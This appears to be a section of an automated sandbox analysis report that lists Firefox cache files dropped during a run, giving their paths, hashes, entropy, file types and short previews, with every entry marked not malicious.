                                                                                                                                                                                  SHA-256:A11CA62A50A41B91A9A970C931C80063B732B9F8618F4D69A038EFA51E320805
                                                                                                                                                                                  SHA-512:D09D9B013884600D13BF78CEDC170B5C30A16730112466D1E72321E6FDF3BCE211EBD59E6A85E91D8AB9419BBE0AF81902C3322A306B07A6F5A0EBBA6E52E41D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"2xcuolhhb44h21fnnaxg95pj72","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"VDkZ-T8IDP0dBb9LIAXbvOdhi-5tRn0iyCOU42ByFBT6mxl_ItVvwcgFUAjVI3sbkJvloMWp3Unwy7e8ouCOoZ5eY4uuj8fvH1A2UMe3HFhNMkTsZekb303xHQyTy8yT","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"cfr","last_modified":1708300804547},"timestamp":1699046525260,"changes":[{"groups":["cfr"],"content":{"text":"","layout":"short_message","buttons":{"primary":{"event":"PROTECTION","label":{"string_id":"cfr-doorhanger-milestone-ok-button"},"action":{"type":"OPEN_PROTECTION_REPORT"}},"secondary":[{"event":"DISMISS","label":{"string_id":"cfr-doorhanger-milestone-close-button"},"action":{"type":"CANCEL"}}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\9E1BD84924A0E8A5BC63358C74B9B4D054CFB504

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16711
                                                                                                                                                                                  Entropy (8bit):6.281717038585735
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z/+L7VqN4mApqN3Xo70tNo+pwPm082nyFz/a65:Z/+QApQHkKo+pwPo2I
                                                                                                                                                                                  MD5:037762193264712DCC531D44D6B50B4F
                                                                                                                                                                                  SHA1:9E47461BF1AF824535BCC85B17563D64D208C3A3
                                                                                                                                                                                  SHA-256:74B9DA2FC160638FB979D39BE9B36A2EEB749DA76C0529D692F5ADEA856066BA
                                                                                                                                                                                  SHA-512:A196F67C9E880AEA4FCF8975AF54177FF3A343066AC692B24389E4F0128EB5BE8DE15B8713AEC6AB027C61CBC7D32701991B00BA7516216A713543CCAE291424
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.8.. .m...9$L3...g..#EVZl.......?..x"6v..s......@rkD.H.3k.....V.v....J....h5.;..5..8IX...K..G.|Y.C..<...T..iX>........H.....u4...f.? A...._..4.%$}......S&{V.V..BT.....b............xd..P.4.rB k.....z.cR)&.h....O...*GKS......'n..R..D......vv^.O.$.&.m.(.J..3..9.z.n.TP<B8.0M...,..S.y..Xt....=.y.7.=..).9z.c..}Y.....uG,k..n'.G..6y8\|....~.]..uWNy..s!2.r82.V.+.;..=..V/j.....~... ....0..tc-<...<J'..,.'...r....F....{..S.5..w...p..9.,....`.-;...WF.....M1.N.U#}..^K....:<..UY.....wj.kK..2....#>X.B...n$4......MX;..AJ...H...S.#.....c.....El.....S1.A.....?.d9~.M.H...V2..h.!.K...&.....a..7<.e.I..o.y.+.b.....P...Z..1...!B.u-...,...a.%`..B..8...^].av.#.B.v..s..o..0.)G..'$nQ......ln.t2R..,..Q..L.lT.[KHW..=....I..(.u.....OQ...(I.(.T..."%...,i ....n'{f..-5.ww.0.cGmI!..aU.+O."}....}.........G5)WZ?.......i..(Vy....).F.A............C#..........cS.....6+..|....:.\.%...0\cT-....,..,....J....J..#x...|C....=.....b.VX..5.)...P....t=(..,$:m..Z..b`..O..Yz..n.tE...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\9F2227F98F812B06835F9D22E5A2DCBF7064D2B2

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):145408
                                                                                                                                                                                  Entropy (8bit):5.30129426807303
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:dA2izZWUdYJlFQu6zVh7VzOh0Rc04zNU0vCKF8k:RKwgIou6zVhK0Rc04zBrF8k
                                                                                                                                                                                  MD5:6B88B6C580FB07FF3BBCEE2E2C18F04E
                                                                                                                                                                                  SHA1:1AF85DFAFA7FBC02A597E08D89D1DB2AF6D23CC4
                                                                                                                                                                                  SHA-256:CE3A24EB132F6810F181D2AA4A7929EDF94967EB5B00678F02F00AEF846FC866
                                                                                                                                                                                  SHA-512:0360DECE4592DE259A8564ED707BE890DF8EE39E1B31E62DC38CFD901C936A3C194A8C4F014ECAA3C19E2820206C21BB02AB7B1B5524B65854B20546810BF558
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"1526xz659wc2524fjnl5jmwrc8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"0Rv3kTuT-IsyMl7_pOa_AfK1NVZapSxAIn0XNhUQyFqmRg7PNFKsPkkLtOX5c-_8xtHAkpEOsGXW4sw2oapELSF8Ri-cu8Glu-NRzaFX-OfaAAdxT6YutgA0KeLQVBbe","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEwsfTf5S2a2sekbOGwvfp1fzj+EX015Cbp8qoECAsPf3bIiOUBcpsPNrqE7CwENuT9M56G330NauFdbZuhlUOBbOWisNkg7ytb5xloJUDSUNPtm+vMLaNp+RQO9COPvWl"},"id":"nimbus-desktop-experiments","last_modified":1708446279357},"timestamp":1708446279105,"changes":[{"slug":"speculative-connect-sockets-with-lcp-beta","appId":"firefox-desktop","appName":"firefox_desktop","channel":"beta","endDate":null,"locales":null,"branches":[{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"valu

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\9FC8C85689D31525EACE26158B83B464F43A027B

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23602
                                                                                                                                                                                  Entropy (8bit):7.760782342711032
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/+n2MtV0rAD0PTaId3:cqrVO++tw/9CICFbQLlx+2MtVpD0La83
                                                                                                                                                                                  MD5:ADC34CA55BA442687BB3079FBCF68EDB
                                                                                                                                                                                  SHA1:9D99C45BDE4748594A382548A4345CB776164C85
                                                                                                                                                                                  SHA-256:3561287C1C6619A7D20BAF1167F9A1FE903BDC1CFBF0E8E1BD9190E22FCCADE2
                                                                                                                                                                                  SHA-512:59AE4DD3FD356F1E88BF3ED1DAB7ADFD6216396BCB1115D0B0885E26DBEE536E01A63B473979B28FBC3FA713D98C596723E8E94CEB9C26B461C9D24F45E947D4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A100D13B31B3B47B8A440E86B5443E2156994819

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):836652
                                                                                                                                                                                  Entropy (8bit):7.998802621175594
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:24576:RU5+yypiAf3Q5sQ2rveB3Rd0fXj9i+BZqYqrWn:g+yycAY5mrva3RdCjgY3
                                                                                                                                                                                  MD5:B00F1A36BF726B662A505EC300181282
                                                                                                                                                                                  SHA1:B65B2C382916A55116EBC30238E5011D74E983A1
                                                                                                                                                                                  SHA-256:5EB9EDC53AEA6D20BE3B27D45BA72688F46F85AB852332797DAED7F93642A610
                                                                                                                                                                                  SHA-512:07AEDB13E2265C284C6F08A6E4D92CCCB21298798CBB6102AE8DA8BF25422A3E267C0F13F5BC8CDAB4495029D1B309AAD3B2F37FD9CA3321C03DE109D2213E3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......M.....f..W~)....,........Vs...U...!Vb...6....f...B.B...$h.v.x=..?..D.......;...........o y...*.w.(W#... _../.....u.`...Yq..u.."l.....E........h.M...'..xK.,<.O.....O.h...sy..(BX.[..M...q.......vc.4.L{..9>9..;.......$!..(....0h........s..?Y../Q.'E.,...V....pR...Fr...qs.....Q..T.kz-.........><..:..6r.....$.....(.....--...P.vK..&.d...xuJ6......2j..&oz..+PF<../...o...2=X......2....c.G..V<7.nt....O.!.{m;.}....LP...N|...U...3.).+.SW6G..l..B..u\...m-).9.r..j..nd_....h.*....kD.#.O.0.....;Z........{..4.g..;-+.w.=^..(.m.a/.w$...-....af&..........E~9...8/.....}...3K.2.[b....P.3.k.............N.rR.)..a.3...3./E..t..o..3>.....m.N...o...{..;.........B..~...W....S3..n(..|..Z...Nb.r";.iw.V.6=V..O.>g..k..^.....C=>5+.G..".37..Q.....l~.!...[8.X..+......}r.V._.o...PG.....V.2..._..\.8....e..m......o..&W&..THW.*P4+..........s)....4.....g.A.i........N..?3..{g.i..#.U.}.gL..........n..Gu.a.6.$X....b.n.{.4..9.....;=n..x.d.S:o.+.0.3.?&....V.....J..~.y....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A398CFC829DD05CC6D4CAF6BB0834CC705BDC52C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16563
                                                                                                                                                                                  Entropy (8bit):6.240542672430208
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m9CfLTL+7VqN4mApqN3Xo70tNo+pwPm082nyFz/aAa:m9aHHApQHkKo+pwPo2z
                                                                                                                                                                                  MD5:26CC7EB72C7F43BE8C7E34886201DB97
                                                                                                                                                                                  SHA1:FAE9AEDC86D1315A30A1E8E575DFE421FC4310CF
                                                                                                                                                                                  SHA-256:7A41353CF251936CF246BE93BA89E01C060B13E485A4BB57F47740C586220BD4
                                                                                                                                                                                  SHA-512:C9EBBCBD869510BB2FE622FCCFDE1A6C705A70C1316EEBC456753E31117090A2A0C9A6127ADAA31680F633FCC39FD92E2D0E0A09CFFA10AA1179D72DE06D825B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..@. ......L1p![l..w.Q....M....u.0....[....,.......wq;i.a.~_[.`...`!..3z..U...;.8..pWY.r.so=...=.j.&...+.@\#.....?...,.`,.*.....q.......'.U]..U...?(...........}IO.ImA=.I..@.>-.....;...5en........9.../.5I...9.g8t..,`..=G`.L.D7..........3._9....@2&]m.._...R.c\o.3 .{.N..GC..*......E.GQ.....k.%...>.9..k.....Q..C./.. .P+..uK....E..p.....a.).&.....gD .....".D.Y....;_`...{.3@.M...K.T.,T....D.Q..O.Q..O>..?..b1.n..pfy...)..S;Ca@.M...6j.D....B2..P.60>.;....,].W\..Q........A.......L.3~.*..a.{.Y......7eH.E...~I>...Ps.\..Q.2...)...mn..\&.8..b...:{.3.e^....Si......3...`..,.]......X.5...O{...%_`...@.@....(.:U..@e.)`.T1U........\....l].o.@_+..QGhN.(F..c.Er.M..P.L2...p..|.....(2V..D...?...GJ...&..s..z(.o.....D...v#)S.......H..ZSJ......O....CU.......1.a..`QM........e..!e..!F.+.g..|........O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js.necko:classified

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A39E6C1BF8D75E708837A24DC2EC1FDD56F842A7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 303628288
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17265
                                                                                                                                                                                  Entropy (8bit):7.315148695841036
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:dMWYUCyptNgbIxn/7o8ZqFqmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxlCvDx6:3YujX8zSWvoI8zSWvoIBHJmvOz
                                                                                                                                                                                  MD5:26111C06C8E22F7DECA0014FEC1C9FD7
                                                                                                                                                                                  SHA1:A89DA232449715B820E93377F72B6C374262E000
                                                                                                                                                                                  SHA-256:8C04DACAFBBEFDFFC0B5C7354FBE4FF46B79D56CDDA5FC4DD4E430BAE1FB6007
                                                                                                                                                                                  SHA-512:D59227C0B4DDCD5B98C5568D0FF6D31290F989F2D0DBF3349A489A7986E4B7E4E46FC4B2B5CCBE787EAECAC91102A93A5FFD22C7F2EEF4E96C7B75CD441AC838
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........\iW.H...H4..HCY.@..+.',I..+..6..E.l.....s.JRI...~...&H.[......t.....L/..........}.<.M.....h.....u..Y:f4....xd^X7.O....`<.=..i..f...dn...1.K.^.S......I@..[x....n.p:KF.....6.....=....s.:l..w.5Z.....p...cv...!~^....whM.pN@.q9........Ah..aQ..a{...I....!~..Y{.................uNC.X....g..x:...5zH.H....I2NL.........G.a.../.F.|x..g.=.G..e.sn5vF.....[..x..8...0l..5.X.e.F.wo.w7`9......Jh..a....|....O.-.B..R.n...C..4...H...|z._l:............K...S.\....m.LwM..vy...Z\,......w.06......#.I,..r......m.^.....T.UM.......2$.*.Uh....6..2.@..m....1.....Tb..n.. ../...F..*:.RV.''..~).^./........<..l.......&...<;.&.`..q..kJ.;;...<.Z.i.-.].:...E.qe..'.?...%M.`.E^....{..I4N.|._.a8.'?J{..L..I._.u..~....D}O_.<..........X\.qf...N..;......\.M..|..x...|.!............McmW..U...?..^./.wY..x...}.`EC.|..........i.x..q.k.=...=e.u..e.......M:..m.a....:.)4..}.........I8..@5nY...q......$..B.I... LT.N...........W..Ny2...............@;U.`<....x|5.W`...{8.t....x4

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A752BE816C32A166B4212612D41570FEFDA0B4E8

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23814
                                                                                                                                                                                  Entropy (8bit):7.768086745081726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzZQ2MtV0rAD0PTaw:jslQ+LhUoTB0Qr6Qjkg/DmcJufzZvMto
                                                                                                                                                                                  MD5:01DB4CBADA3A72A79FD416A2C54952D0
                                                                                                                                                                                  SHA1:D2F736B4EB057EE73338528F32333083D06A338A
                                                                                                                                                                                  SHA-256:9D04E224B9887B58DA3194699AA3B37483F68426B4CADCE0F34E0660970EB982
                                                                                                                                                                                  SHA-512:EE198A9E44289312C8092A42508C39D2E8AA2AA6A5C74BAB8829D50142D4688171B8D48A5760AFE9EEDC1DA0ECC38C341A7554285AD1FE32E4218E0A57037BD4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A7615E86A1A16BADBC7C7C6F959B650FEEA38F98

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10690
                                                                                                                                                                                  Entropy (8bit):6.08569119937783
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Wapn0t7Yaxh6+/6zeXtph56TGrO3afbaI8j3qMpULYYQ6jBr/CULYYQ6jBr//:Zpn02amNydTaqTaIdlLYYQ6/LYYQ6B
                                                                                                                                                                                  MD5:7A9D3A124A1BE02AE4F43DAB07ADE249
                                                                                                                                                                                  SHA1:09599AC61D541DA80FF4E9FD6A7137A0DEA11D5D
                                                                                                                                                                                  SHA-256:D1A062BFF6F4320E1BBD2288866D592BEE320F5E43B98D59FE2E5CDD8B9B0341
                                                                                                                                                                                  SHA-512:48C0507934665ECF81BFB1BCAB9E53C682C0B1D4730C709CD58FA87B8C18737F7DF36EFF4D414354FC978785F3F9A0FDAFD2F00D8F07C5591ED1D6FC5DA15BC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"page_size":25,"page_count":1,"count":0,"next":null,"previous":null,"results":[]}...Lt........e...e...F.A.e...........a,:https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org&lang=en-US.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAbVMIIG0TCCBLmgAwIBAgIQA47lgwap6xyAEGMKtXVO6TANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0OFoXDTI1MDIx

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\A858259C15269B8488E8006F0D0609FF19960C81

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):38693
                                                                                                                                                                                  Entropy (8bit):7.668681827680487
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:vbRrJVMvBJMdBEuXKhQfJApQHkKo+pwPo2o:vZ/M5JcrKB0SQn
                                                                                                                                                                                  MD5:56C92BECE0341718D1AB7663B8F30594
                                                                                                                                                                                  SHA1:022982D391DDFFFBAC923F6E0A02F7814416CF62
                                                                                                                                                                                  SHA-256:4E6E7E691BAFD22D5AD3B4925B7D8A04F83187C8D787707B0EB203E2ED68BFB0
                                                                                                                                                                                  SHA-512:F5CE26C2304F5BAFD22411F24114DFB282DF9F1C3788A23F08C119012E24C0C6E4D0D360561EC04D913ED638ADF2F87AE2EE36125521844497AD6961BA32314B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.f&....z.4...X.}......./.t.rcg.TS..s....!......%b.ci..R./. eY.u..&\..&.d...$.....ro.v7P...z....I.>.....Z..].u7 =...AR....K..J...#.lK..[.p.mO.!...w... 8...>d.h.[.5..eh~....l.L3.!=.w9.5...j.... .c..k...%.....K..+.7..N}.wQ.5...l....9..7G?.../c|f].Y..7{!S..'9...+B.Y5t.#...5..M.dp.> ..;^nD....0.D.a:DI.a..(.."v......|.7..5...tS.....d.5u.:.(.~k..kA.OJCU..Rb..6...\..$.E]....+..w.^7k... .2.l..y..^..&t.f...k.^.....?0`V9y.f..M.X./...u.:...`.*.k$IN..!..U.(|.%3o.......a(DZJ[...f..-....g*...An..E3.~....O..m.hI.RH{......*...w.R...Y&.....@.I.p....b.'.o....1@....!.dc.Bw....Q.$4...kAc..AR.`.)J.....S..k.I.?..wb..Fx....[o.j.rks..l..E.z.9.#y.o\...m.1~...........l.v.8z...3X.g[.<.<X..4..*.+6Z.......jq,..nD.2'...^!|.d]........i....o.__.....Uo....u....i....^h. p.+T.4..had.a..?......7_S.Qx..........W....`I..\v...F......6.....c[...=...{.,.&.(....2..g.T<y...r..zt}.U.[.F..pH.,~.](.........r..m... D...3..~.o.w....8.Y.j2`........&..... p$.v.......wOY..........

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\AAA9F23F37D64057D1FC065F44803E1254DC5093

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10220)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):89296
                                                                                                                                                                                  Entropy (8bit):5.588970570694905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:drOMDK8NFbtMD636tHdHaOMjKwSo3XItkuSbFdXynW3s6J8xym:drOqFGMj1s6J8xym
                                                                                                                                                                                  MD5:E3AD4C5AB1BA9E43BADC57225F1368C6
                                                                                                                                                                                  SHA1:E66E011C391FB54603B11EF18F445146A5E3E058
                                                                                                                                                                                  SHA-256:9131F426D5FDC097374D6F649740F75E62EE954A435483226AF0FA8D45700482
                                                                                                                                                                                  SHA-512:718CC42E93A4354E7FF25E8565B6E6C3C38BB7E2E5A57CB43A89A922611DABE60C86AF7DF405C64996F531DFB9B4ACB602A04563CFFA3E31D46A79622C41BD5A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("GroupsCometAnswerAgentEducationModalQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="26010742205205782"}),null);.__d("GroupsCometAnswerAgentEducationModalQuery$Parameters",["GroupsCometAnswerAgentEducationModalQuery_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("GroupsCometAnswerAgentEducationModalQuery_facebookRelayOperation"),metadata:{},name:"GroupsCometAnswerAgentEducationModalQuery",operationKind:"query",text:null}};e.exports=a}),null);.__d("coerceRelayImage_image.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:{mask:!1},name:"coerceRelayImage_image",selections:[{alias:null,args:null,kind:"ScalarField",name:"height",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"scale",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"uri",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"width",st

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\AC52345D1E4C100D0A5E582F5873BDCA7A294C43

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8045
                                                                                                                                                                                  Entropy (8bit):6.040222095317026
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:iiMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckTLUcuTLc:GWebV2GZuZrFK0k0t7qW0NbZovEpoc
                                                                                                                                                                                  MD5:DFF0D28FDCB15634E11EC1A4271BC133
                                                                                                                                                                                  SHA1:1E5B4726B4082C59E1ED2F4C429948BEA64E61D9
                                                                                                                                                                                  SHA-256:01B379C9E6B7EE1E1D93AE994A6115E928BFFE8482E75630756402663C830EB1
                                                                                                                                                                                  SHA-512:470C3E64E23A270E0DD8AA3D4F40559AB82D10A47675B127B2A4D113FC474069C8CC7F253F0EF824403687206684D8DB596DC0965EE12B6F4065BD153E27730D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..b/........e...e...F.A.e......{....a,~1708514990,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hsz

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\AEC077A8DA76492108766EEE7A6DF0E84FAD94E9

